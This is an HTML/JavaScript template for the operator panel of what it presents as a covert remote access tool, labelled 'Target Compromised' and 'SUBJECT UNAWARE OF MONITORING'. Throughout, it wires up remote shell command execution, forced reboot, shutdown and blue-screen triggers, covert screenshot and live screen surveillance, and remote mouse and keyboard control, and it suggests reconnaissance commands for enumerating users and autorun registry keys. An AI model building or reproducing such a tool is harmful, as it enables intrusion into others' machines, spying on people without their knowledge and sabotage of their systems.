{% extends "base.html" %}

{% block content %}
<div class="row">
    <div class="col-12">
        <h1 class="mb-4" style="color: #ff0033; text-shadow: 0 0 10px #ff0033; font-family: 'VT323', monospace;">
            <i class="fas fa-remote-control me-2"></i>System Control Terminal <span class="cursor"></span>
        </h1>
        <div class="d-flex align-items-center mb-3">
            <span class="badge bg-danger me-2" style="text-transform: uppercase; letter-spacing: 1px;">Target Compromised</span>
            <span class="badge" style="background-color: #333; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px;">Root Access: Granted</span>
        </div>
    </div>
</div>

<!-- System Control Actions -->
<div class="row mb-4">
    <div class="col-md-6">
        <div class="card">
            <div class="card-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">
                    <i class="fas fa-power-off me-2"></i>System Takeover Controls
                </h5>
            </div>
            <div class="card-body" style="background-color: #0a0a0a;">
                <div class="mb-3">
                    <label for="delay-select" class="form-label" style="color: #cccccc; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">Execution Delay (seconds):</label>
                    <select class="form-select" id="delay-select" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #333; font-family: 'Courier New', monospace;">
                        <option value="30">30 seconds</option>
                        <option value="60" selected>1 minute</option>
                        <option value="300">5 minutes</option>
                        <option value="600">10 minutes</option>
                        <option value="0">IMMEDIATE EXECUTION</option>
                    </select>
                </div>
                <div class="d-grid gap-2">
                    <button class="btn btn-warning" onclick="performSystemAction('restart')" style="background-color: #ff0033; border-color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                        <i class="fas fa-redo me-2"></i>Force System Reboot
                    </button>
                    <button class="btn btn-danger" onclick="performSystemAction('shutdown')" style="background-color: #ff0033; border-color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                        <i class="fas fa-power-off me-2"></i>Terminate System
                    </button>
                    <button class="btn btn-info" onclick="performSystemAction('logout')" style="background-color: #ff0033; border-color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                        <i class="fas fa-sign-out-alt me-2"></i>Force User Disconnect
                    </button>
                    <button class="btn btn-danger" onclick="performSystemAction('bsod')" style="background-color: #ff0033; border-color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                        <i class="fas fa-bug me-2"></i>Trigger Blue Screen
                    </button>
                </div>
            </div>
        </div>
    </div>
    
    <div class="col-md-6">
        <div class="card">
            <div class="card-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">
                    <i class="fas fa-terminal me-2"></i>Remote Shell Access
                </h5>
            </div>
            <div class="card-body" style="background-color: #0a0a0a;">
                <div class="mb-3">
                    <label for="command-input" class="form-label" style="color: #cccccc; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">Execute System Commands:</label>
                    <div class="input-group">
                        <span class="input-group-text" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #333;">$</span>
                        <input type="text" class="form-control" id="command-input" 
                               placeholder="Enter command for execution..." 
                               onkeypress="if(event.key==='Enter') executeCommand()" 
                               style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #333; font-family: 'Courier New', monospace;">
                        <button class="btn btn-primary" onclick="executeCommand()" style="background-color: #ff0033; border-color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                            <i class="fas fa-play me-1"></i>EXECUTE
                        </button>
                    </div>
                </div>
                <div class="mb-2">
                    <small style="color: #666; font-family: 'Courier New', monospace;">
                        <strong style="color: #ff0033;">Suggested commands:</strong> netstat -an, tasklist, whoami /all, ipconfig /all, net user, reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                    </small>
                </div>
                <div id="command-output" class="p-3 rounded" style="background-color: #000000; color: #ff0033; height: 200px; overflow-y: auto; font-family: 'Courier New', monospace; border: 1px solid #333;">
                    <small style="color: #666;">C:\> Awaiting command input...</small>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Action Status -->
<div class="row mb-4">
    <div class="col-12">
        <div class="card">
            <div class="card-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">
                    <i class="fas fa-history me-2"></i>Exploitation Log
                </h5>
            </div>
            <div class="card-body" style="background-color: #0a0a0a;">
                <div id="action-history" style="font-family: 'Courier New', monospace;">
                    <div class="list-group">
                        <div class="list-group-item" style="background-color: #0a0a0a; color: #cccccc; border-color: #333;">
                            <div class="d-flex justify-content-between align-items-start">
                                <div>
                                    <h6 class="mb-1" style="color: #ff0033;">Initial Access</h6>
                                    <p class="mb-1 text-muted">Target system compromised</p>
                                </div>
                                <span class="badge bg-success">success</span>
                            </div>
                            <small class="text-muted">2023-06-15 08:23:45</small>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Screen Control -->
<div class="row mb-4">
    <div class="col-md-8">
        <div class="card">
            <div class="card-header d-flex justify-content-between align-items-center" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">
                    <i class="fas fa-desktop me-2"></i>Surveillance Feed
                </h5>
                <div class="btn-group btn-group-sm">
                    <button class="btn" onclick="takeScreenshot()" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                        <i class="fas fa-camera me-1"></i>Capture
                    </button>
                    <button class="btn" onclick="startScreenShare()" id="screen-share-btn" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                        <i class="fas fa-play me-1"></i>Live Monitor
                    </button>
                </div>
            </div>
            <div class="card-body text-center" style="background-color: #0a0a0a;">
                <div id="screen-display" style="min-height: 300px; background: #000000; border: 1px solid #ff0033; border-radius: 0; display: flex; align-items: center; justify-content: center; position: relative; overflow: hidden;">
                    <div style="color: #666;">
                        <i class="fas fa-desktop fa-3x mb-3"></i>
                        <p style="font-family: 'Courier New', monospace; text-transform: uppercase; letter-spacing: 1px;">TARGET MONITORING INACTIVE - CLICK "CAPTURE" TO BEGIN SURVEILLANCE</p>
                    </div>
                </div>
                <div class="mt-3">
                    <small style="color: #666; font-family: 'Courier New', monospace;">
                        <i class="fas fa-info-circle me-1"></i>
                        SUBJECT UNAWARE OF MONITORING • CLICK ON SCREEN TO CONTROL MOUSE • USE KEYBOARD CONTROLS FOR REMOTE INPUT
                    </small>
                </div>
            </div>
        </div>
    </div>
    
    <div class="col-md-4">
        <div class="card mb-3">
            <div class="card-header">
                <h6 class="card-title mb-0">
                    <i class="fas fa-mouse me-2"></i>Mouse Control
                </h6>
            </div>
            <div class="card-body">
                <div class="row g-2">
                    <div class="col-4">
                        <button class="btn btn-outline-secondary btn-sm w-100" onclick="sendMouseAction('left_click')">
                            <i class="fas fa-mouse-pointer"></i><br><small>Left</small>
                        </button>
                    </div>
                    <div class="col-4">
                        <button class="btn btn-outline-secondary btn-sm w-100" onclick="sendMouseAction('right_click')">
                            <i class="fas fa-mouse-pointer"></i><br><small>Right</small>
                        </button>
                    </div>
                    <div class="col-4">
                        <button class="btn btn-outline-secondary btn-sm w-100" onclick="sendMouseAction('double_click')">
                            <i class="fas fa-mouse-pointer"></i><br><small>Double</small>
                        </button>
                    </div>
                </div>
            </div>
        </div>
        
        <div class="card">
            <div class="card-header">
                <h6 class="card-title mb-0">
                    <i class="fas fa-keyboard me-2"></i>Keyboard Control
                </h6>
            </div>
            <div class="card-body">
                <div class="mb-3">
                    <input type="text" class="form-control" id="text-input" placeholder="Type text to send..." onkeypress="if(event.key==='Enter') sendText()">
                </div>
                <div class="d-grid gap-2">
                    <button class="btn btn-outline-primary btn-sm" onclick="sendText()">
                        <i class="fas fa-paper-plane me-1"></i>Send Text
                    </button>
                    <div class="row g-1">
                        <div class="col-6">
                            <button class="btn btn-outline-warning btn-sm w-100" onclick="sendKey('ctrl+c')">
                                <small>Ctrl+C</small>
                            </button>
                        </div>
                        <div class="col-6">
                            <button class="btn btn-outline-warning btn-sm w-100" onclick="sendKey('ctrl+v')">
                                <small>Ctrl+V</small>
                            </button>
                        </div>
                        <div class="col-6">
                            <button class="btn btn-outline-warning btn-sm w-100" onclick="sendKey('alt+tab')">
                                <small>Alt+Tab</small>
                            </button>
                        </div>
                        <div class="col-6">
                            <button class="btn btn-outline-warning btn-sm w-100" onclick="sendKey('enter')">
                                <small>Enter</small>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Quick Actions -->
<div class="row">
    <div class="col-12">
        <div class="card">
            <div class="card-header">
                <h5 class="card-title mb-0">
                    <i class="fas fa-bolt me-2"></i>Quick Actions
                </h5>
            </div>
            <div class="card-body">
                <div class="row">
                    <div class="col-md-3 mb-2">
                        <button class="btn btn-outline-primary w-100" onclick="executeQuickCommand('systeminfo')">
                            <i class="fas fa-info-circle me-1"></i>System Info
                        </button>
                    </div>
                    <div class="col-md-3 mb-2">
                        <button class="btn btn-outline-primary w-100" onclick="executeQuickCommand('ipconfig')">
                            <i class="fas fa-network-wired me-1"></i>Network Config
                        </button>
                    </div>
                    <div class="col-md-3 mb-2">
                        <button class="btn btn-outline-primary w-100" onclick="executeQuickCommand('tasklist')">
                            <i class="fas fa-tasks me-1"></i>Task List
                        </button>
                    </div>
                    <div class="col-md-3 mb-2">
                        <button class="btn btn-outline-primary w-100" onclick="executeQuickCommand('netstat -an')">
                            <i class="fas fa-chart-line me-1"></i>Network Stats
                        </button>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
let actionHistory = [];

function performSystemAction(action) {
    const delay = document.getElementById('delay-select').value;
    
    if (!confirm(`Are you sure you want to ${action} the system in ${delay} seconds? This action cannot be undone.`)) {
        return;
    }
    
    fetch('/api/system_action', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            action: action,
            delay: parseInt(delay)
        })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            showAlert('success', `${action.toUpperCase()} scheduled successfully. System will ${action} in ${delay} seconds.`);
            addToHistory(`System ${action} scheduled`, `${delay}s delay`, 'success');
        } else {
            showAlert('danger', `Error: ${data.error}`);
            addToHistory(`Failed to ${action} system`, data.error, 'danger');
        }
    })
    .catch(error => {
        showAlert('danger', `Network error: ${error.message}`);
        addToHistory('Network error', error.message, 'danger');
    });
}

function executeCommand() {
    const command = document.getElementById('command-input').value.trim();
    if (!command) {
        showAlert('warning', 'Please enter a command');
        return;
    }
    
    const outputDiv = document.getElementById('command-output');
    outputDiv.innerHTML = '<div class="text-info">Executing command...</div>';
    
    fetch('/api/execute_command', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            command: command
        })
    })
    .then(response => response.json())
    .then(data => {
        let output = `<div class="text-success">$ ${data.command}</div>`;
        
        if (data.stdout) {
            output += `<div class="text-light">${escapeHtml(data.stdout)}</div>`;
        }
        
        if (data.stderr) {
            output += `<div class="text-danger">Error: ${escapeHtml(data.stderr)}</div>`;
        }
        
        output += `<div class="text-muted">Exit code: ${data.returncode}</div>`;
        output += `<div class="text-muted">Time: ${new Date(data.timestamp).toLocaleString()}</div>`;
        
        outputDiv.innerHTML = output;
        outputDiv.scrollTop = outputDiv.scrollHeight;
        
        addToHistory(`Command executed: ${command}`, `Exit code: ${data.returncode}`, data.returncode === 0 ? 'success' : 'warning');
        
        // Clear command input
        document.getElementById('command-input').value = '';
    })
    .catch(error => {
        outputDiv.innerHTML = `<div class="text-danger">Network error: ${error.message}</div>`;
        addToHistory('Command execution failed', error.message, 'danger');
    });
}

function executeQuickCommand(command) {
    document.getElementById('command-input').value = command;
    executeCommand();
}

function addToHistory(action, details, status) {
    const timestamp = new Date().toLocaleString();
    actionHistory.unshift({
        action: action,
        details: details,
        status: status,
        timestamp: timestamp
    });
    
    // Keep only last 10 actions
    if (actionHistory.length > 10) {
        actionHistory = actionHistory.slice(0, 10);
    }
    
    updateHistoryDisplay();
}

function updateHistoryDisplay() {
    const historyDiv = document.getElementById('action-history');
    
    if (actionHistory.length === 0) {
        historyDiv.innerHTML = '<p class="text-muted">No actions performed yet.</p>';
        return;
    }
    
    let historyHtml = '<div class="list-group">';
    actionHistory.forEach(item => {
        const badgeClass = item.status === 'success' ? 'bg-success' : 
                          item.status === 'warning' ? 'bg-warning' : 'bg-danger';
        
        historyHtml += `
            <div class="list-group-item">
                <div class="d-flex justify-content-between align-items-start">
                    <div>
                        <h6 class="mb-1">${item.action}</h6>
                        <p class="mb-1 text-muted">${item.details}</p>
                    </div>
                    <span class="badge ${badgeClass}">${item.status}</span>
                </div>
                <small class="text-muted">${item.timestamp}</small>
            </div>
        `;
    });
    historyHtml += '</div>';
    
    historyDiv.innerHTML = historyHtml;
}

function showAlert(type, message) {
    const alertDiv = document.createElement('div');
    alertDiv.className = `alert alert-${type} alert-dismissible fade show position-fixed`;
    alertDiv.style.cssText = 'top: 20px; right: 20px; z-index: 9999; max-width: 400px;';
    
    alertDiv.innerHTML = `
        ${message}
        <button type="button" class="btn-close" data-bs-dismiss="alert"></button>
    `;
    
    document.body.appendChild(alertDiv);
    
    // Auto remove after 5 seconds
    setTimeout(() => {
        if (alertDiv.parentNode) {
            alertDiv.remove();
        }
    }, 5000);
}

function escapeHtml(text) {
    const div = document.createElement('div');
    div.textContent = text;
    return div.innerHTML;
}

// Screen control functions
let screenShareInterval = null;

function takeScreenshot() {
    const screenDisplay = document.getElementById('screen-display');
    screenDisplay.innerHTML = '<div class="text-info"><i class="fas fa-spinner fa-spin"></i> Taking screenshot...</div>';
    
    fetch('/api/screenshot')
        .then(response => response.json())
        .then(data => {
            if (data.success) {
                screenDisplay.innerHTML = `
                    <img src="${data.image}" 
                         style="max-width: 100%; max-height: 400px; border-radius: 5px; cursor: crosshair;" 
                         onclick="handleScreenClick(event)"
                         title="Click to control mouse">
                `;
                addToHistory('Screenshot taken', `${data.width}x${data.height}`, 'success');
            } else {
                screenDisplay.innerHTML = `<div class="text-danger">Error: ${data.error}</div>`;
                addToHistory('Screenshot failed', data.error, 'danger');
            }
        })
        .catch(error => {
            screenDisplay.innerHTML = `<div class="text-danger">Network error: ${error.message}</div>`;
            addToHistory('Screenshot failed', error.message, 'danger');
        });
}

function startScreenShare() {
    const btn = document.getElementById('screen-share-btn');
    
    if (screenShareInterval) {
        // Stop screen sharing
        clearInterval(screenShareInterval);
        screenShareInterval = null;
        btn.innerHTML = '<i class="fas fa-play me-1"></i>Start Live View';
        btn.className = 'btn btn-success btn-sm';
        addToHistory('Screen sharing stopped', 'Live view disabled', 'info');
    } else {
        // Start screen sharing
        btn.innerHTML = '<i class="fas fa-stop me-1"></i>Stop Live View';
        btn.className = 'btn btn-danger btn-sm';
        
        // Take initial screenshot
        takeScreenshot();
        
        // Set up interval for live updates
        screenShareInterval = setInterval(() => {
            takeScreenshot();
        }, 2000); // Update every 2 seconds
        
        addToHistory('Screen sharing started', 'Live view enabled', 'success');
    }
}

function handleScreenClick(event) {
    const img = event.target;
    const rect = img.getBoundingClientRect();
    const x = Math.round((event.clientX - rect.left) * (img.naturalWidth / img.width));
    const y = Math.round((event.clientY - rect.top) * (img.naturalHeight / img.height));
    
    sendMouseAction('left_click', x, y);
}

function sendMouseAction(action, x = 0, y = 0) {
    fetch('/api/mouse_control', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            action: action,
            x: x,
            y: y
        })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            addToHistory(`Mouse ${action}`, `Position: (${x}, ${y})`, 'success');
        } else {
            addToHistory('Mouse action failed', data.error, 'danger');
        }
    })
    .catch(error => {
        addToHistory('Mouse action failed', error.message, 'danger');
    });
}

function sendText() {
    const textInput = document.getElementById('text-input');
    const text = textInput.value.trim();
    
    if (!text) {
        showAlert('warning', 'Please enter text to send');
        return;
    }
    
    fetch('/api/keyboard_control', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            text: text
        })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            addToHistory('Text sent', text, 'success');
            textInput.value = '';
        } else {
            addToHistory('Text send failed', data.error, 'danger');
        }
    })
    .catch(error => {
        addToHistory('Text send failed', error.message, 'danger');
    });
}

function sendKey(key) {
    fetch('/api/keyboard_control', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            key: key
        })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            addToHistory(`Key sent: ${key}`, '', 'success');
        } else {
            addToHistory('Key send failed', data.error, 'danger');
        }
    })
    .catch(error => {
        addToHistory('Key send failed', error.message, 'danger');
    });
}

// Initialize page
document.addEventListener('DOMContentLoaded', function() {
    // Focus on command input
    document.getElementById('command-input').focus();
    
    // Add click handler for text input enter key
    document.getElementById('text-input').addEventListener('keypress', function(e) {
        if (e.key === 'Enter') {
            sendText();
        }
    });
});
</script>
{% endblock %}